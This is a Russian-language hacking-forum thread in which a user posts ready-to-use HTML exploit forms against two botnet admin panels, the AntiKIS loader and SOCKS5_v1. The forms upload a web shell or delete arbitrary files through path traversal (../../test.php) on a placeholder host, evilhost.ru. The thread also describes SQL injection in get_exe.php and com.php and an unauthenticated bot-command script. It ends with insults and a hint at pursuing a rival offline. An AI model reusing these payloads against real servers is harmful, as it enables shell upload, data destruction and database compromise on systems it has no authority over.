• XSS.stack #1 – первый литературный журнал от юзеров форума

[SPLOIT] Loader-Resident AntIKiss v1.2 и SOCKS5_v1

Одинокий Волк

CPU register
Забанен
Регистрация
16.05.2005
Сообщения
1 264
Решения
1
Реакции
3
Пожалуйста, обратите внимание, что пользователь заблокирован
Короче что бы некоторые "умные" как они считают личности поменьше говорили на форумах. Первый сплойт.

<!--//
***********************************************************************************
* Sploit for AntiKIS_Loader v1.2 *
* *
* Сплойт был написан, что бы показать bduser что он еблан, *
* т.к. любому кодеру это видно по коду. *
* *
* Одинокий Волк (Lonely Wolf) *
***********************************************************************************
//-->


<center><h3>Сплойт под ебланский софт, special for bduser.</h3></center>


<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">Такого гавно-кода я уже давно не видел, куча инжектов, заливка шелла, удаление файлов 0о</p>


<form action="http://www.evilhost.ru/admin/load.php" method="POST" enctype="multipart/form-data">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/load.php<br />
File - выберите шелл для загрузки

Local file - укажите файл локальный какое имя будет, пример: ../../test.php

</p>


<b>File:</b> <input type="file" name="filename">

<b>Local file:</b> <input type="text" name="f" value="test.php">

<input type="submit" value="Залить!">
</form>



<form action="http://www.evilhost.ru/admin/load.php" method="POST">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/load.php<br />
Local file - укажите файл локальный какой надо удалить, пример: ../../test.php

</p>


<b>Local file:</b> <input type="text" name="f" value="../../test.php">

<input type="submit" value="Залить!">
</form>

Под сокс:

<!--//
***********************************************************************************
* Sploit for SOCKS5_v1.0 *
* *
* Сплойт был написан, что бы показать bduser что он еблан, *
* т.к. любому кодеру это видно по коду. *
* *
* Одинокий Волк (Lonely Wolf) *
***********************************************************************************
//-->


<center><h3>Сплойт под ебланский софт, special for bduser.</h3></center>


<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">Такого гавно-кода я уже давно не видел, куча инжектов, заливка шелла, удаление файлов 0о</p>


<form action="http://www.evilhost.ru/admin/fake.php" method="POST" enctype="multipart/form-data">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла fake.php, пример: http://www.host.ru/admin/fake.php<br />
File - выберите шелл для загрузки

Local file - укажите файл локальный какое имя будет, пример: ../../test.php

</p>


<b>File:</b> <input type="file" name="filename">

<b>Local file:</b> <input type="text" name="f" value="test.php">

<input type="submit" value="Залить!">
</form>



<form action="http://www.evilhost.ru/admin/fake.php" method="POST">
<p style="background-color:#EEEEEE;border:1px #CCCCCC solid;margin:3px;">
Укажите в коде form action="url" до файла load.php, пример: http://www.host.ru/admin/fake.php<br />
Local file - укажите файл локальный какой надо удалить, пример: ../../test.php

</p>


<b>Local file:</b> <input type="text" name="f" value="../../test.php">

<input type="submit" value="Залить!">
</form>

Инжекты на каждом углу.
Просто друшлаг.
Внимание! Я думаю что файлы load.php и fake.php там не случайно можете просто зайти на них, это своего рода шеллы, позволяющие удалить/закачать любой файл.
Я думаю автор не раз этим пользовался в своих целях.

По поводу инжектов, к примеру антикисс, файл get_exe.php?userid=-1
Видим запросы
// получаем данные для userid
$result = mysql_query("SELECT * FROM `mx_comps5` WHERE `userid` = '$userid'", $db);
и
$result = mysql_query("UPDATE `mx_comps5` SET `ansercom` = 1 where `userid` = '$userid'", $db);
До этого фильтрации нигде нет, тупо:
// получаем имя нашего компа
$userid = $_GET['name'];
if($userid == "") $userid = "default";

В SOCKS5_v1.0 тоже самое только файл берём com.php

// Одинокий Волк
 
Пожалуйста, обратите внимание, что пользователь заблокирован
© мр_сталин
20.10.2008 23:48

продолжаем разговор, на сей раз это лоадер AntiKIS 1.2 //Топик с продажей

вес бинаря: 10кб, написан на сях, пожат упыхом
работает только после ребута (зато как заверяют обходит почти все фаеры за счёт этого), копирует свои файлы:
%windir%/expmodule.exe
%sysdir%/wstest.dll

т.е. ищим бинарники опять по именам файлов)
админка функционалом не блещет, за счёт чего баг http://host.net/scripts/byname.php
scripts/ - дефолтовая дира админки
byname.php - скрипт подачи команды ботам, открывает без авторизации

з.ы. автор по ходу тру кодер 7ми класник CreateToolhelp32Snapshot :DD
 
Волк, вот ты злое создание :D

Нет в тебе сострадания человеческого :lol2:

Впрочем, это так, лол, а в целом - ты абсолютно прав, быдлокодеров надо убивать как класс - не можешь написать ничего хорошего - не пиши. Учись.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я бы это гавно не трогал если бы не
http://exploit.in/forum/index.php?showtopic=20134
Почитайте внимательно кто нас ддосит, думаю надо заняться этим бакланом в реале ;)
 
Угу, почитал, понято.

Про реал - не говори пожалуйста, интернет дела - решать надо в интернете, это я тебе серьезно говорю.

А репутацию мы ему уже конкретно спортили, хрен у него теперь кто-то что-то купит.

С него хватит.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх